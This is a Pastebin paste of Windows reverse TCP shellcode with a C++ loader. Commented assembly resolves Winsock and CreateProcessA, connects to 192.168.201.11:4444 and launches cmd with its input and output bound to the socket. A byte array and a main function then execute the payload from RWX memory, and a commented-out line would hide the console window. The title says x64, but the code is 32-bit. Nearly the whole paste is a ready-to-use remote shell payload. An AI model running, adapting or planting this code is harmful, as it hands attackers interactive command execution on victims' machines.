API tools faq
paste
Advertisement
ewos

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode

ewos
Dec 6th, 2021
41
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.72 KB | None | 0 0
raw download clone embed print report
  1. # Title:
  2. Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
  3. /*
  4.  
  5. MIT License
  6.  
  7. Copyright (c) 2021 Xenofon Vassilakopoulos
  8.  
  9. Permission is hereby granted, free of charge, to any person obtaining a copy
  10. of this software and associated documentation files (the "Software"), to deal
  11. in the Software without restriction, including without limitation the rights
  12. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  13. copies of the Software, and to permit persons to whom the Software is
  14. furnished to do so, subject to the following conditions:
  15.  
  16. The above copyright notice and this permission notice shall be included in all
  17. copies or substantial portions of the Software.
  18.  
  19. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  20. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  21. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  22. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  23. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  24. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  25. SOFTWARE.
  26.  
  27.  
  28. [BITS 32]
  29.  
  30. global _start
  31.  
  32. section .text
  33.  
  34. _start:
  35.  
  36. ; Locate Kernelbase.dll address
  37. XOR ECX, ECX ;zero out ECX
  38. MOV EAX, FS:[ecx + 0x30] ;EAX = PEB
  39. MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr
  40. MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList
  41. LODSD ;memory address of the second list entry structure
  42. XCHG EAX, ESI ;EAX = ESI , ESI = EAX
  43. LODSD ;memory address of the third list entry structure
  44. XCHG EAX, ESI ;EAX = ESI , ESI = EAX
  45. LODSD ;memory address of the fourth list entry structure
  46. MOV EBX, [EAX + 0x10] ;EBX = Base address
  47.  
  48. ; Export Table
  49. MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew
  50. ADD EDX, EBX ;EDX = PE Header
  51. MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table
  52. ADD EDX, EBX ;EDX = Export table
  53. MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table
  54. ADD ESI, EBX ;ESI = Names table
  55. XOR ECX, ECX ;EXC = 0
  56.  
  57. GetFunction :
  58.  
  59. INC ECX; increment counter
  60. LODSD ;Get name offset
  61. ADD EAX, EBX ;Get function name
  62. CMP dword [EAX], 0x50746547 ;"PteG"
  63. JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP"
  64. CMP dword [EAX + 0x4], 0x41636F72 ;"rocA"
  65. JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA"
  66. CMP dword [EAX + 0x8], 0x65726464 ;"ddre"
  67. JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre"
  68.  
  69. MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals
  70. ADD ESI, EBX ;ESI = Ordinals table
  71. MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function
  72. DEC ECX ;Decrement the ordinal
  73. MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table
  74. ADD ESI, EBX ;ESI = Address table
  75. MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset)
  76. ADD EDX, EBX ;EDX = GetProcAddress
  77.  
  78. ; Get the Address of LoadLibraryA function
  79. XOR ECX, ECX ;ECX = 0
  80. PUSH EBX ;Kernel32 base address
  81. PUSH EDX ;GetProcAddress
  82. PUSH ECX ;0
  83. PUSH 0x41797261 ;"Ayra"
  84. PUSH 0x7262694C ;"rbiL"
  85. PUSH 0x64616F4C ;"daoL"
  86. PUSH ESP ;"LoadLibrary"
  87. PUSH EBX ;Kernel32 base address
  88. MOV ESI, EBX ;save the kernel32 address in esi for later
  89. CALL EDX ;GetProcAddress(LoadLibraryA)
  90.  
  91. ADD ESP, 0xC ;pop "LoadLibraryA"
  92. POP EDX ;EDX = 0
  93. PUSH EAX ;EAX = LoadLibraryA
  94. PUSH EDX ;ECX = 0
  95. MOV DX, 0x6C6C ;"ll"
  96. PUSH EDX
  97. PUSH 0x642E3233 ;"d.23"
  98. PUSH 0x5F327377 ;"_2sw"
  99. PUSH ESP ;"ws2_32.dll"
  100. CALL EAX ;LoadLibrary("ws2_32.dll")
  101.  
  102. ADD ESP, 0x10 ;Clean stack
  103. MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress
  104. PUSH 0x61617075 ;"aapu"
  105. SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa")
  106. PUSH 0x74726174 ;"trat"
  107. PUSH 0x53415357 ;"SASW"
  108. PUSH ESP ;"WSAStartup"
  109. PUSH EAX ;ws2_32.dll address
  110. MOV EDI, EAX ;save ws2_32.dll to use it later
  111. CALL EDX ;GetProcAddress(WSAStartup)
  112.  
  113. ; Call WSAStartUp
  114. XOR EBX, EBX ;zero out ebx register
  115. MOV BX, 0x0190 ;EAX = sizeof(struct WSAData)
  116. SUB ESP, EBX ;allocate space for the WSAData structure
  117. PUSH ESP ;push a pointer to WSAData structure
  118. PUSH EBX ;Push EBX as wVersionRequested
  119. CALL EAX ;Call WSAStartUp
  120.  
  121. ;Find the address of WSASocketA
  122. ADD ESP, 0x10 ;Align the stack
  123. XOR EBX, EBX ;zero out the EBX register
  124. ADD BL, 0x4 ;add 0x4 at the lower register BL
  125. IMUL EBX, 0x64 ;EBX = 0x190
  126. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  127. PUSH 0x61614174 ;"aaAt"
  128. SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa")
  129. PUSH 0x656b636f ;"ekco"
  130. PUSH 0x53415357 ;"SASW"
  131. PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument
  132. MOV EAX, EDI ;EAX now holds the ws2_32.dll address
  133. PUSH EAX ;push the first argument of GetProcAddress
  134. CALL EDX ;call GetProcAddress
  135. PUSH EDI ;save the ws2_32.dll address to use it later
  136.  
  137. ;call WSASocketA
  138. XOR ECX, ECX ;zero out ECX register
  139. PUSH EDX ;null value for dwFlags argument
  140. PUSH EDX ;zero value since we dont have an existing socket group
  141. PUSH EDX ;null value for lpProtocolInfo
  142. MOV DL, 0x6 ;IPPROTO_TCP
  143. PUSH EDX ;set the protocol argument
  144. INC ECX ;SOCK_STREAM(TCP)
  145. PUSH ECX ;set the type argument
  146. INC ECX ;AF_INET(IPv4)
  147. PUSH ECX ;set the ddress family specification argument
  148. CALL EAX ;call WSASocketA
  149. XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later
  150.  
  151. ;Find the address of connect
  152. POP EDI ;load previously saved ws2_32.dll address to ECX
  153. ADD ESP, 0x10 ;Align stack
  154. XOR EBX, EBX ;zero out EBX
  155. ADD BL, 0x4 ;add 0x4 to lower register BL
  156. IMUL EBX, 0x63 ;EBX = 0x18c
  157. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  158. PUSH 0x61746365 ;"atce"
  159. SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a")
  160. PUSH 0x6e6e6f63 ;"nnoc"
  161. PUSH ESP ;"connect", second argument of GetProcAddress
  162. PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress
  163. XCHG ECX, EBP
  164. CALL EDX ;call GetProcAddress
  165.  
  166. ;call connect
  167. PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11
  168. PUSH word 0x5c11 ;port = 4444
  169. XOR EBX, EBX ;zero out EBX
  170. add BL, 0x2 ;TCP protocol
  171. PUSH word BX ;push the protocol value on the stack
  172. MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol)
  173. PUSH byte 16 ;the size of sockaddr - 3rd argument of connect
  174. PUSH EDX ;push the sockaddr - 2nd argument of connect
  175. PUSH EBP ;socket descriptor = 64 - 1st argument of connect
  176. XCHG EBP, EDI
  177. CALL EAX ;execute connect;
  178.  
  179. ;Find the address of CreateProcessA
  180. ADD ESP, 0x14 ;Clean stack
  181. XOR EBX, EBX ;zero out EBX
  182. ADD BL, 0x4 ;add 0x4 to lower register BL
  183. IMUL EBX, 0x62 ;EBX = 0x194
  184. MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress
  185. PUSH 0x61614173 ;"aaAs"
  186. SUB dword [ESP + 0x2], 0x6161 ;"As"
  187. PUSH 0x7365636f ;"seco"
  188. PUSH 0x72506574 ;"rPet"
  189. PUSH 0x61657243 ;"aerC"
  190. PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress
  191. MOV EBP, ESI ;move the kernel32.dll to EBP
  192. PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress
  193. CALL EDX ;execute GetProcAddress
  194. PUSH EAX ;address of CreateProcessA
  195. LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA
  196.  
  197. ;call CreateProcessA
  198. PUSH 0x61646d63 ;"admc"
  199. SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a)
  200. MOV ECX, ESP ;ecx now points to "cmd" string
  201. XOR EDX, EDX ;zero out EDX
  202. SUB ESP, 16
  203. MOV EBX, esp ;pointer for ProcessInfo
  204.  
  205. ;STARTUPINFOA struct
  206. PUSH EDI ;hStdError => saved socket
  207. PUSH EDI ;hStdOutput => saved socket
  208. PUSH EDI ;hStdInput => saved socket
  209. PUSH EDX ;lpReserved2 => NULL
  210. PUSH EDX ;cbReserved2 => NULL
  211. XOR EAX, EAX ;zero out EAX register
  212. INC EAX ;EAX => 0x00000001
  213. ROL EAX, 8 ;EAX => 0x00000100
  214. PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100
  215. PUSH EDX ;dwFillAttribute => NULL
  216. PUSH EDX ;dwYCountChars => NULL
  217. PUSH EDX ;dwXCountChars => NULL
  218. PUSH EDX ;dwYSize => NULL
  219. PUSH EDX ;dwXSize => NULL
  220. PUSH EDX ;dwY => NULL
  221. PUSH EDX ;dwX => NULL
  222. PUSH EDX ;pTitle => NULL
  223. PUSH EDX ;pDesktop => NULL
  224. PUSH EDX ;pReserved => NULL
  225. XOR EAX, EAX ;zero out EAX
  226. ADD AL, 44 ;cb => 0x44 (size of struct)
  227. PUSH EAX ;eax points to STARTUPINFOA
  228.  
  229. ;ProcessInfo struct
  230. MOV EAX, ESP ;pStartupInfo
  231. PUSH EBX ;pProcessInfo
  232. PUSH EAX ;pStartupInfo
  233. PUSH EDX ;CurrentDirectory => NULL
  234. PUSH EDX ;pEnvironment => NULL
  235. PUSH EDX ;CreationFlags => 0
  236. XOR EAX, EAX ;zero out EAX register
  237. INC EAX ;EAX => 0x00000001
  238. PUSH EAX ;InheritHandles => TRUE => 1
  239. PUSH EDX ;pThreadAttributes => NULL
  240. PUSH EDX ;pProcessAttributes => NULL
  241. PUSH ECX ;pCommandLine => pointer to "cmd"
  242. PUSH EDX ;ApplicationName => NULL
  243. CALL EBP ;execute CreateProcessA
  244.  
  245. */
  246.  
  247. #include <windows.h>
  248. #include <iostream>
  249. #include <stdlib.h>
  250.  
  251. char code[] =
  252. "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b"
  253. "\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31"
  254. "\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f"
  255. "\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde"
  256. "\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53"
  257. "\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54"
  258. "\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33"
  259. "\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04"
  260. "\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68"
  261. "\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc"
  262. "\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c"
  263. "\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68"
  264. "\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06"
  265. "\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b"
  266. "\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63"
  267. "\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c"
  268. "\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83"
  269. "\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61"
  270. "\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72"
  271. "\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64"
  272. "\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57"
  273. "\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52"
  274. "\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50"
  275. "\x52\x52\x51\x52\xff\xd5";
  276.  
  277. int main(int argc, char** argv)
  278. {
  279. //HWND hWnd = GetConsoleWindow();
  280. //ShowWindow(hWnd, SW_HIDE);
  281. printf("Shellcode Length: %d\n", strlen(code));
  282. void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  283. memcpy(exec, code, sizeof(code));
  284. ((void(*)())exec)();
  285.  
  286. return 0;
  287. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!